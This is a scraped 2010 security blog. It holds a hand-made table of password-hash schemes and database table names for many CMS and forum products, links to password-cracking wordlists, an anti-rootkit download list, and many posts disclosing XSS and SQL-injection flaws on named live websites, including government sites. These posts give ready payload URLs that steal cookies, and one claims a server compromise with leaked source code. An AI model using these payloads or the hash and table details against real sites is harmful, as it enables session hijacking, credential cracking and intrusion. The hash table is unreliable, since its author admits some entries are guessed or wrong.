http://www.farefuturofondazione.it/ff/page.asp?StrMotore=dada"><video src=1 onerror=alert(1)><"&Cat=Motore

Hashes Algorithms used in different web applications

Hashes Algorithms used in different web applications.
I've done this list by hand. Not all the hashes algos are correct (I've generically added md5 or ??? where is unkwnown).
If you are interested send corrections and I will update it.
I will publish also a better version with tabs.
You can reproduce it without problems. It's part of the project mdcrack gui on sourceforge.
Use the | as data separator.

-----------------------------------------------------------------------------------------------------------------------------------------------------
| Title | Hash Algorithm | TablePrefix | Table Name | Website |
-----------------------------------------------------------------------------------------------------------------------------------------------------
| 1C Битрикс | md5($pass) | | |http://www.1c-bitrix.ru/
| 1024cms | md5($pass) | | |http://www.1024cms.org/
| 4images | md5($pass) | | |http://www.4homepages.de/
| AboCMS | md5($pass) | ??? | users |http://www.abocms.com/
| AdaptCMS Lite | md5($pass) | | |http://www.adaptcms.com/
| Adrevenue | md5($pass) | | |http://www.adrevenue.co.uk/
| AEF | md5($salt.$pass) | | |http://www.anelectron.com/board/
| AIOCP | md5($pass) | | |http://www.aiocp.it/
| Artiphp | md5($pass) | | |http://www.artiphp.com/
| AVE CMS | md5(md5($pass)) | | |http://www.cmsmatrix.org/ave-cms
| b2evolution | md5($pass) | | |http://b2evolution.net/
| Basecmp | md5($pass) | | |http://www.basecmp.de/
| bbPress | md5($pass) | | |http://bbpress.org/
| beContent | md5($pass) | | |http://code.google.com/p/becontent
| Beehive | md5($pass) | ??? | User |http://www.magnettechnologies.com/products.htm
| BIGACE | md5($pass) | ????????? | |http://www.bigace.de/
| Bitrix | md5($pass) | | |http://www.bitrixsoft.com/
| bitweaver | md5($pass) | | |http://www.bitweaver.org/
| Black Pig (Sajon) | md5($pass) | | |http://www.blackpig.co.uk ????
| bloofoxCMS | md5($pass) | | |http://www.bloofox.com/
| ClanTiger | md5($pass) | | |http://www.clantiger.com/
| ClanSphere | md5($pass) or sha1($pass) | | |http://www.csphere.eu/
| CMScout | md5($pass) | | |http://www.cmscout.co.za/
| CMS Made Simple | md5($pass) | | |http://www.cmsmadesimple.org/
| Concrete5 | md5($pass) | | |http://www.concrete5.org/
| Constructr CMS | md5($pass) | | |http://constructr-cms.org/
| Contenido | md5($pass) | | |http://www.contenido.org/
| Contentteller CE | md5($pass) | | |http://www.contentteller.com/
| Coppermine PG | md5($pass) | | |http://coppermine-gallery.net/
| CPG-Nuke | md5($pass) | | |http://dragonflycms.org/
| CruxCMS | md5($pass) | | |http://www.cruxsoftware.co.uk/
| CustomerInfo | md5($pass) | | |
| DanneoCMS | md5($pass) | dn[версия]_ | users |http://www.danneo.com
| DataLife Engine | md5(md5($pass)) | dle_ | users |http://dlecms.com/
| DBHcms | md5($pass) | | |http://www.drbenhur.com/
| DeluxeBB | md5($pass) | | |http://www.deluxebb.com/
| Diferior | md5(md5($pass)) | | |http://diferior.com/
| Digitalus | md5($pass) | | |http://digitaluscms.com/
| DotNetNuke | sha1($pass) | | |http://www.dotnetnuke.com/
| Drupal | md5($pass) | | |http://drupal.org/
| e107 | md5(md5($pass)) | e107_ | user |http://e107.org/
| eazyPortal | md5($pass) | | |http://www.eazyportal.com/
| ecshoprus | md5($pass) | | |http://ecshoprus.ru/
| eLinks | md5($pass) | | |http://elinks.or.cz/
| eliteCMS | sha1($pass) | | |http://www.elitecms.com/
| Elxis | md5($pass) | | |http://www.elxis.org/
| Enano CMS | md5($pass) | | |http://enanocms.org/
| eoCMS | md5($pass) | | |http://eocms.com/
| Etomite | md5($pass) | | |http://www.etomite.org/
| Explay | md5($pass) | | |
| Exponent | md5($pass) | | |http://www.exponentcms.org/
| Flux CMS | md5($pass) | | |https://fosswiki.liip.ch/display/FLX/
| Frog | sha1($pass) | | |http://www.madebyfrog.com/
| FUDforum | md5($pass) | | |http://fudforum.org/
| Fundanemt | md5($pass) | | |http://www.fundanemt.com/
| glFusion | md5($pass) | | |http://www.glfusion.org/
| GeekLog | md5($pass) | | |http://www.geeklog.net/
| html-edit CMS | md5($pass) | | |http://www.html-edit.org
| Icy Phoenix | md5($pass) | | |http://www.icyphoenix.com/
| iDevAffiliate | sha1(idev_secret.$password) | | |http://www.idevdirect.com/
| iGaming | md5($pass) | | |http://www.igamingcms.com/
| ImpressCMS | md5($pass) | | |http://www.impresscms.org/
| Injader | md5($pass) | | |http://www.injader.com/
| Intellect Board | md5($pass) | ??? | User |http://intboard.ru/
| IPB 1.x.x | md5($pass) | ibf_ | members |http://www.invisionpower.com/
| IPB 2.x.x | md5(md5($salt).md5($pass)) | ibf_ | members_converge|http://www.invisionpower.com/
| ITA Forum | md5($pass) | itaf_ | user |https://sourceforge.net/projects/itaforum/
| Jaws CMS | md5($pass) | | |http://www.jaws-project.com/
| Joomla <=1.0.12 | md5($pass) | jos_ | users |http://www.joomla.org/ | Joomla >=1.0.13 | md5($pass.$salt) | jos_ | users |http://www.joomla.org/
| Kajona | sha1($pass) | | |http://www.kajona.de/
| KerviNet Forum | md5($pass) | | |http://photoweb.com.ua/
| Koobi CMS | md5($pass) | koobi_ | user |http://www.dream4.de/
| Koobi CMS >= 6 | md5(md5($pass)) | koobi_ | user |http://www.dream4.de/
| Lanius CMS | md5($pass) | | |http://www.laniuscms.org/
| LifeType | md5($pass) | | |http://www.lifetype.net/
| Mambo | md5($pass) | | |http://mambo-foundation.org/
| MDPro | md5($pass) | | |http://www.maxdev.com/
| MercuryBoard | md5($pass) | mb_ | users |http://mercuryboard.com/
| MiaCMS | md5($pass) | | |http://miacms.org/
| MigasCMS | md5($pass) | | |http://www.sebrac.webcindario.com/
| MiniBB | md5($pass) | minibbtable_| users |http://www.minibb.com/
| MODx CMS | md5($pass) | | |http://modxcms.com/
| Monkey CMS | md5($pass) | | |http://www.monkeycms.com/
| myBB 1.2.x | md5(md5($salt).md5($pass)) | mybb_ | users |http://www.mybboard.net/
| Nucleus | md5($pass) | | |http://nucleuscms.org/
| osCommerce | md5($salt.$pass) | ??? | customers |http://www.oscommerce.com/
| ocPortal | md5($pass) | | |http://ocportal.com/
| OneCMS | md5($pass) | | |http://www.onecms.it/
| OpenBB 1.0.8 | md5($pass) | | |http://www.openbb.com/
| PBLang | md5($pass) | /db/members/| |https://sourceforge.net/projects/pblang/
| Pecio CMS | sha1($pass) | | |http://pecio-cms.com/
| Phenotype CMS | md5($pass) | | |http://www.phenotype-cms.com/
| Phorum 5.0.x | md5($pass) | | |http://www.phorum.org/
| Photopost | md5($pass) | | |http://www.photopost.com/
| phpAds | md5($pass) | | |http://sourceforge.net/projects/phpadsnew/
| PHP-Fusion | md5($pass) | | |http://sourceforge.net/projects/php-fusion/
| PHP-Nuke | md5($pass) | nuke_ | authors |http://phpnuke.org/
| phpBB | md5($pass) | phpbb_ | users |http://www.phpbb.com/
| phpBB >= 3 | md5($phpbb3) | phpbb_ | users |http://www.phpbb.com/
| PhpMyForum | md5($pass) | pmf_ | user |http://phpmyforum.de/
| phpMyAgenda | md5($pass) | | |http://sourceforge.net/projects/phpmyagenda/
| PhpMySport | md5($pass) | | |http://phpmysport.sourceforge.net/
| phpListPro | md5($pass) | | |http://www.smartisoft.com/products.php?product=phpListPro
| PHPSurveyor | md5($pass) | | |http://www.limesurvey.org/
| PunBB 1.2.x | sha1($pass) | ??? | users |http://www.punbb.org/
| PhpWebSite | md5($pass) | | |http://phpwebsite.appstate.edu/
| phpWebThings | md5($pass) | | |http://www.phpwebthings.nl/
| PHPX CMS | md5($pass) | | |http://www.thisrand.com/scripts/phpx
| phpwcms | md5($pass) | | |http://www.phpwcms.de/
| PLUME CMS | md5($pass) | | |http://www.plume-cms.net/
| PostNuke | md5($pass) | | |http://www.postnuke.com/
| Rennder Pixie | md5($pass) | | |http://www.renderpixie.com/
| QuickSilver Forum | md5($pass) | qsf_ | users |http://www.quicksilverforums.com/
| Radiant | sha1(sha1($pass)) | | |http://radiantcms.org/
| Refbase | des($pass,$salt);$salt=substr(email, 0, 2)| | |http://www.refbase.net/
| RunCMS | sha1($username.$pass) | runcms_ | users |http://www.runcms.org/
| Seditio | md5($pass) | | |http://www.neocrome.net/
| Serendipity <=1.4.1 | md5($pass) | | |http://www.s9y.org | Serendipity >= 1.5 | sha1($pass) | | |http://www.s9y.org
| Shinobu | md5($pass) | | |http://shinobu.61924.nl/
| SilverStripe | md5($pass) | | |http://www.silverstripe.com/
| Slaed CMS | md5($pass) | slaed_ | users |http://www.slaed.net/
| SmallNuke 2 | md5($pass) | | |http://www.smallnuke.com/
| sNews | md5($pass) | | |http://www.snewscms.it/
| SMF 1.0.x | md5(HMAC) | smf_ | members |http://www.simplemachines.org/
| SMF 1.1.x | sha1($username.$pass) | smf_ | members |http://www.simplemachines.org/
| Snitz forums 2000 | SHA-256 | FORUM_ | MEMBERS |http://forum.snitz.com/
| Subrion | md5($pass) | | |http://www.subrion.com/
| TangoCMS | md5($pass) | | |http://tangocms.org/
| Tiki Wiki | md5($pass) | | |http://tikiwiki.org/
| Tinypug | md5($pass) | | |http://code.google.com/p/tinypug/
| TRIBiQ | md5($pass) | | |http://tribiq.com/
| Triton CMS | md5($pass) | | |http://www.tritoncms.com/
| Typo3 | md5($pass) | | |http://typo3.org/
| UseBB | md5($pass) | usebb_ | members |http://www.usebb.net/
| Vanilla | md5($pass) | LUM_ | user |http://www.vanillacms.com/
| vBulletin 2.16 | ??? | | user |http://www.vbulletin.org/
| VBulletin 3.x | md5(md5($pass).$salt) | | user |http://www.vbulletin.org/
| VikingBoard | md5($pass) | vboard_ | member |http://sourceforge.net/projects/vboard/
| Voodoo chat | md5($pass) | | |http://vochat.com/ ?????
| W-Agora | md5($pass) | [***]_ | users |http://www.w-agora.com/
| Website Baker | md5($pass) | | |http://www.websitebaker2.org/
| Webspell | md5($pass) | ws_ Rand(3)_| user |http://www.webspell.org/
| Wordpress | md5($pass) | wp_ | users |http://wordpress.org/download/
| Wordpress >= 2.5 | md5($phpbb3) | wp_ | users |http://wordpress.org/download/
| WWWThreads | DES($pass) | w3t_ | users |http://www.wwwthreads.com/
| Xaraya (XarBB) | md5($pass) | | |http://www.xaraya.com/
| XMB Forum | md5($pass) | ??? | members |http://www.xmbforum.com/
| XOOPS | md5($pass) | xoops_ | users |http://www.xoops.org/
| YaBB | md5(HMAC) | yabbse_ | members |http://www.yabbforum.com/
-----------------------------------------------------------------------------------------------------------------------------------------------------

Saturday, 24 April 2010

Theregister.co.uk XSS


Lately I've found a stored XSS on theregister.co.uk.
The xss can be used only by sending, via a POST request,
both values "job_function" and "other_job_function" (or both "job_sector" "other_job_sector")
in the -users' area-.
By sending a specific link we can excalate privileges with the automation of the reset of the victim's password.
Obviously the victim should be logged in!
A full video explaining how to get other accounts starting from the the stored XSS and a few CSRF

You can watch here a video explaining the problem and the simulation
of the hijacking of a session of a theregister's user.

Archived page on securitytube: http://archive.is/OgZlz


They have already replied to my email and solved the problem! Thumbs up for them.

Thursday, 22 April 2010

List of wordlists

I've put up a list of links to several wordlists. Links have been grabbed from several websites:

I don't know your blog, I've found the links on on different websites.

(I've used http://rapiddigger.com/ and similar sites so I've not cared before about the references. Add a comment if you want a link. There's no problem about it.)
http://carlitobrigante.wordpress.com/2008/03/21/wyd-e-raccolta-wordlist/
http://blog.advanced-techno.net/index.php/2008/07/13/wordlist-da-15-gb/
http://www.backtrack-linux.org/forums/old-pentesting/4336-%3Dxploitz%3D-thread-share-wordlist-2.html
http://www.ashiyane.org/forums/showthread.php?p=60160
http://hashcrack.blogspot.com

I will update the list when I will find/need other links.

http://rapidshare.com/files/135050307/wordlist--hrvatski.txt.html
http://rapidshare.com/files/67152210/1_5GB_Wordlist_gepackt_5MB_.rar
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://www.outpost9.com/files/WordLists.html
http://hashkiller.com/files/downloads/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://vxchaos.6x.to/Wordlists and Wordlist Tools/
http://www.hack3r.com/wordlists/wikipedia-wordlist-sraveau-20090325.txt.bz2
http://downloads.sourceforge.net/cracklib/cracklib-words-20080507.gz
http://packetstormsecurity.org/Crackers/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.vulnerabilityassessment.co.uk/passwords.zip
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.insidepro.com/eng/download.shtml
http://www.apasscracker.com/dictionaries/
http://downloads.skullsecurity.org/passwords/
http://rapidshare.com/files/88229830/Wordlist.rar
http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz
http://www.megaupload.com/?d=QTK6GI9K | birthdates
http://www.megaupload.com/?d=XV34VA9Z | default wpa list 8 to 40 alpha-numeric chararacters
http://www.megaupload.com/?d=L7LQSH5U |BIG WPA WORDLIST #1
http://www.megaupload.com/?d=2P23UCLV |BIG WPA WORDLIST #2
http://www.megaupload.com/?d=F6DEE204 |BIG WPA WORDLIST #3
http://article7.org/wordlists/
http://rapidshare.com/files/100655354/Bender-ILLIST.rar.html
http://milw0rm.org/mil-dic.php
http://www.rohitab.com/discuss/index.php?s=fc0c2d65c4f55e204846775b49346668&app=core&module=attach&section=attach&attach_id=1235
http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz
http://nomorecrypto.com/files/naxxatoe-dict-total-new-unsorted.torrent
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://bright-shadows.net/download/downloads.php
http://www.mit.edu/~ecprice/wordlist.10000
http://www.neutronsite.com/WordList.txt
http://artofhacking.com/tucops/hack/password/
http://rapidshare.com/files/165513464/word.lst.s.u.john.s.u.200.part01.rar |wordlist su john #1
http://rapidshare.com/files/165518143/word.lst.s.u.john.s.u.200.part02.rar |wordlist su john #2
http://rapidshare.com/files/165498510/word.lst.s.u.john.s.u.200.part03.rar |wordlist su john #3
http://rapidshare.com/files/90611743/purehates_word_list.part1.rar | purehates wordlist #1
http://rapidshare.com/files/90620632/purehates_word_list.part2.rar | purehates wordlist #2
http://rapidshare.com/files/90628318/purehates_word_list.part3.rar | purehates wordlist #3
http://rapidshare.com/files/90636711/purehates_word_list.part4.rar | purehates wordlist #4
http://rapidshare.com/files/90639703/purehates_word_list.part5.rar | purehates wordlist #5
http://rapidshare.com/files/90571168/-_Xploitz_-_Master_Password_Collection.part1.rar
http://rapidshare.com/files/90580220/-_Xploitz_-_Master_Password_Collection.part2.rar
http://rapidshare.com/files/90584305/-_Xploitz_-_Master_Password_Collection.part3.rar
http://rapidshare.com/files/90592992/-_Xploitz_-_Master_Password_Collection.part4.rar
http://rapidshare.com/files/90598343/-_Xploitz_-_Master_Password_Collection.part5.rar
http://rapidshare.com/files/90603742/-_Xploitz_-_Master_Password_Collection.part6.rar
http://rapidshare.com/files/90605481/-_Xploitz_-_Master_Password_Collection.part7.rar -->-> Password: http://forums.remote-exploit.org/
http://rapidshare.com/files/90652987/-_Xploitz_-_PASSWORD_DVD.part01.rar
http://rapidshare.com/files/90660770/-_Xploitz_-_PASSWORD_DVD.part02.rar
http://rapidshare.com/files/90673505/-_Xploitz_-_PASSWORD_DVD.part03.rar
http://rapidshare.com/files/90682244/-_Xploitz_-_PASSWORD_DVD.part04.rar
http://rapidshare.com/files/90691363/-_Xploitz_-_PASSWORD_DVD.part05.rar
http://rapidshare.com/files/90700044/-_Xploitz_-_PASSWORD_DVD.part06.rar
http://rapidshare.com/files/90702550/-_Xploitz_-_PASSWORD_DVD.part07.rar -->-> Password: http://forums.remote-exploit.org/

Tuesday, 20 April 2010

Anti rootkits list

Anti rootkits list




 ATool - http://www.antiy.net/download/atool.rar
 ATool (mirror) - http://www.kernelmode.info/ARKs/atool.rar
 Avast! Antirootkit - http://files.avast.com/files/beta/aswar.exe
 Antivir Antirootkit - http://dl.antivir.de/down/windows/antivir_rootkit.zip
 Catchme - http://www2.gmer.net/catchme.exe
 CodeWalker ARK - http://cmcinfosec.com/download/cmcark_cw0.2.4.500.rar
 CodeWalker ARK (mirror) - http://www.kernelmode.info/ARKs/cmcark_cw0.2.4.500.rar
 CsrWalker - http://www.rootkit.com/vault/DiabloNova/cwalker.rar
 DarkSpy 1.05 - http://www.rootkit.com/vault/cardmagic/DS105fix2beta.rar
 DeepMonitor - http://orkblutt.free.fr/DeepMonitor.exe
 Deep System Explorer - http://diamondcs.com.au/downloads/dsesetup.exe
 Dr. Web DwShark (mirror) - http://www.kernelmode.info/ARKs/DwShark.rar
 F-Secure Blacklight - ftp://ftp.f-secure.com/anti-virus/tools/fsbl.exe
 Find_Hidden_Dll (by Eric_71) 0.1.1.1 - http://eric71.geekstogo.com/beta/Find_Dll.exe
 GMER - http://www2.gmer.net/gmer.zip
 Helios - http://helios.miel-labs.com/downloads/Helios.zip
 Helios Lite - http://helios.miel-labs.com/downloads/Helios-Lite.zip
 HiddenFinder - http://www.wenpoint.com/download/HiddenFinder_setup.exe
 Hook Analyzer - http://www.resplendence.com/download/hookanlz302.exe
 HookShark - http://home.arcor.de/neotracer/HookShark.rar
 IceSword 1.22 (english) - http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip
 IceSword 1.22 (english) (mirror) - http://www.kernelmode.info/ARKs/IceSword122en.zip
 Kernel Detective v1.3.1 - http://www.at4re.com/files/Tools/Releases/GamingMasteR/Kernel_Detective_v1.3.1.zip
 Kernel Detective v1.3.1 (mirror) - http://www.kernelmode.info/ARKs/Kernel_Detective_v1.3.1.zip
 kX-Ray 1.0.0.102 - http://bugczech.fu8.com/bin/kX-Ray_v1.0.0.102_XP32_beta.zip
 McAfee Rootkit Detective - http://download.nai.com/products/mcafee-avert/McafeeRootkitDetective.zip
 modGREPER - http://invisiblethings.org/tools/modGREPER/modGREPER-0.3-bin.zip
 NIAP Rootkit Detect Tools - http://www.rootkit.com/vault/uty/NIAPAntiRootkitTools.rar
 Panda Antirootkit - http://research.pandasecurity.com/blogs/images/AntiRootkit.zip
 Process Hunter - http://www.wasm.ru/baixado.php?mode=tool&id=359
 Process Walker - http://www.rootkit.com/vault/DiabloNova/ProcessWalker.rar
 Radix - http://www.usec.at/downloads3/radix_installer.zip
 RegReveal - http://www.geocities.jp/kiskzo/regreveal_v10beta3.zip
 RootkitDetector - http://www.tarasco.org/security/Rootkit_Detector_rkdetector/RootkitDetector.zip
 Rootkit Unhooker 3.8 - http://www.rootkit.com/vault/DiabloNova/RkU3.8.386.589.rar
 Rootkit Revealer - http://download.sysinternals.com/Files/RootkitRevealer.zip
 RootQuest (dead link) - http://comsentry.com/files/RootQuest_v1.exe
 RootQuest (mirror) - http://www.kernelmode.info/ARKs/RootQuest_v1.rar
 RootRepeal - http://rootrepeal.googlepages.com/RootRepeal.rar
 Safe'n'Sec Personal Pro + Rootkit Detector - http://www.safensoft.com/sns/snsrd_eng.exe
 SafetyCheck 1.7 - http://yyuyao.googlepages.com/SafetyCheck1.7Beta.rar
 SanityCheck 2.00 - http://www.resplendence.com/download/sanitySetup.exe
 Sophos Antirootkit - http://www.sophos.com/products/free-tools/sophos-anti-rootkit/download/
 Stealth MBR Rootkit Detector - http://www2.gmer.net/mbr/mbr.exe
 SysProt Antirootkit - http://sites.google.com/site/sysprotantirootkit/Home/SysProt.zip?attredirects=0&d=1
 SysReveal - http://www.sysreveal.com/download/SysReveal.zip
 TDSS Remover - http://www.esagelab.com/files/tdss_remover_latest.rar
 Tizer Rootkit Razor - http://www.tizersecure.com/freedownloads/Tizer%20Rootkit%20Razor%20Setup.msi
 TrendMicro RootkitBuster - http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_2.80.1077.zip
 VBA32 Antirootkit - ftp://vba.ok.by/vba/beta/Vba32arkit_beta.zip
 XueTr - http://xuetr.com/download/XueTr.zip
 YasKit 1.223 - http://qzdx.kafan.cn/down1//AntiSpyWare/2009/YasKit1.223.rar
 YasKit 1.223 (mirror) - http://www.kernelmode.info/ARKs/YasKit1.223.rar




Ref: kernelmode.info

Sunday, 18 April 2010

rot13 party | XSS forms

Ok ... now with the rot13


string
 </textarea><script>alert(document.cookie);</script><textarea>
encoded
 </grkgnern><fpevcg>nyreg(qbphzrag.pbbxvr);</fpevcg><grkgnern>
------------------------------------------
sites with raw post


http://www.rot13.com/index.php
text=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://rot13-encoder-decoder.ewebdev.com/
plain_text_for_rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%281%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




http://authors.aspalliance.com/brettb/ROT13EncodingWithASP.asp
ROT13=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&B1=Encode%2FDecode+ROT13


http://www.retards.org/projects/rot13/
rotme=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://edoceo.com/utilitas/rot13
in=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cmd=ROT13


http://geekgirl.dk/stuff/rot13.html
intext=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://mcraigweaver.com/rot13.php
raw=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cooked=&Rotate=Rotate+it.


http://doug.finalownage.com/tools/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://www.geomatics.ca/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encrypt+%2F+Decrypt&submitted=yes


http://spectraldesign.net/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&convert=ROT-13


http://lowkeysoft.com/LostARG/rot13.php
decoding=true&code=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&submit=Decode




http://www.toms-geocache.de/Werkzeuge/rot13.php?txtROT13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&btnCoder=kodieren


http://www.lasoft.cz/gc/hw/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=%C5%A0ifruj+%2F+de%C5%A1ifruj


http://www.viruscom2.com/web-app/encode-decode-ROT13.php
textCode=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encode-Decode+Now%21%21%21


http://www.nwhtweb.com/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://kamil.eu.org/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




------------------------------------------------
Urg .... most of them are repetitive and too simple. 

sourcecodesworld.com - givemethecode.com | XSS SQL Injection



asp/mysql SQL INJ
http://www.sourcecodesworld.com/showScriptSite.asp?ScriptId=459




XSS (back from google?)
http://www.sourcecodesworld.com/search.asp?domains=www.sourcecodesworld.com%3Bwww.givemethecode.com&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&sa=Google+Search&sitesearch=www.sourcecodesworld.com&client=pub-6213915329796065&forid=1&channel=7633136160&ie=ISO-8859-1&oe=ISO-8859-1&cof=GALT%3A%23995500%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3AB00C00%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A004F23%3BALC%3AB00C00%3BLC%3AB00C00%3BT%3A000000%3BGFNT%3A000000%3BGIMP%3A000000%3BLH%3A50%3BLW%3A313%3BL%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%2Fimages%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%3BFORID%3A11&hl=en


XSS

http://www.givemethecode.com/sign.asp?returnURL=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22http://www.givemethecode.com/source/view-my-source.asp

http://base64-decode.php-functions.com/ | XSS

The idea is to use any data to decode (base64 in this case) and see if we can inject the xss.


http://base64-decode.php-functions.com/

other websites



http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec






We need to submit this string base64 encoded
 -------------------------------------------------------------
<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>
  -------------------------------------------------------------
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu
dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==
 -------------------------------------------------------------


Note: The <textarea> tags are useless in this case but are working in the 90% of other similar cases that are showing the results in a textarea.


a different one with text input
 http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=


----------------------------------------


I've found another base64 decoder more trivial. with a few differences.
http://www.toastedspam.com/decode64
- it doesn't decode correctly the data
- it tries to remove/convert with some html entities <>


I've spent about ten minutes (sic) to achieve this XSS




The string to convert (b=a; is garbage to have a good string without random characters after decoding)
a=document.cookie; b=a; alert(a); 
The converted string
YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7





When we submit the data we should use tamper data (or firebug to change the html) and
change disp with script (disp=script) 


text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script



tobu.co.jp | xss

the tobu railway in japan.


http://www.tobu.co.jp/transit_fare/?link=http://eki.tobu.co.jp/norikae/pc/N3?USR=PC&sf=1735-%91%e5%98a%93c&st=2319-%90V%8b%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22%cb%90%b6&sr=0&pn=3&rp=0&tp=0&ep=1&date=2'0100418&time=0910

www.normateneo.unibo.it | xss

simple
http://www.normateneo.unibo.it/NormAteneo/default.htm?search=0&view=1&PageNumber=1&textToSearch=%22%3e%3cscript%3ealert(document.cookie)%3b%3c%2fscript%3e%3c%22

Saturday, 17 April 2010

turkstat.gov.tr | XSS - sys compromise

http://www.turkstat.gov.tr/kp/kullanici/forgotPassword.do?reqCode=pre%3Cscript%3Ealert(1);%3C/script%3EpareForgotPasswordForm

tehran.gov.ir | sql injection - XSS - system compromise


Set free all the political captives, all the human rights activists.
The Iranian  Government should think about the internal problems instead of arguing about anything.
Iran and the Usa MUST stop all the Atomic Programs.
The new Iran must be laic, with the freedom to choose your religion, peaceful and without any kind of violence!

Equal rights for the women! 
Stop the violences!
------------------------------------------------------------------------- 



there are for sure other xss and sql injections.

several sql injections in NewsId
http://www.tehran.gov.ir/new/Default_view.asp?NewsId=13892


XSS in name (
http://www.tehran.gov.ir/new/Default_Services.asp?chid=17&name=<script>alert(document.cookie);</script>


The system could be compromised (windows box) and get the source code due to a misconfiguration.
You can download the source code here. 

Friday, 16 April 2010

Watch youtube with opera browser - "GO UPGRADE!"

Youtube have update the website practically kicking the butt of the opera browser's users with the permanent message  "GO UPGRADE!".

There's a workaround to fix this issue!
Just install this user javascript file


Before anything, if you've not done it before, you must create the folder for the scripts (I suggest a folter within the opera application folder ... if you want in the applcation data).
I've used "%programfiles%\Opera\JS"
Put this javascript in the folder. -click here-

( copyright 2010, Snap )
After that go into opera and click on File->preferences->Advanced->Content->Javascript Options
select the User Javascript folder.


Reference: http://extendopera.org/userjs/content/youtube-protection-remover 

mail.com | xss, possible phishing/spam


http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002žscriptualert(EXSSE)ž/scriptu&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=30530-web-20100416-201528&rt=STANDARD#x0D;ascript:alert(%27myxss%27);%22%3E&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=anything&rt=STANDARD


base url: http://web.mail.com/
31423-111 - can be anything (url rewriting??)
mmc-2/ - can be anything (url rewriting??)
en-us - can be anything (url rewriting??). This should set the language.
common -  - can be anything (url rewriting??)



A funny joke XD (for me)
http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=You need to buy a new computer&rt=STANDARD

europa.eu - xpath injections

europa.eu is mainly based on cold fusion and Oracle as dbms (via jdbc)
The main website is probably proxied via http://yakima.cc.cec.eu.int:6085  (I'm not able to clearly understand all the errors from coldfusion)


------link removed as requested------

I cannot publish the url but it's easy to spot (in my opinion).

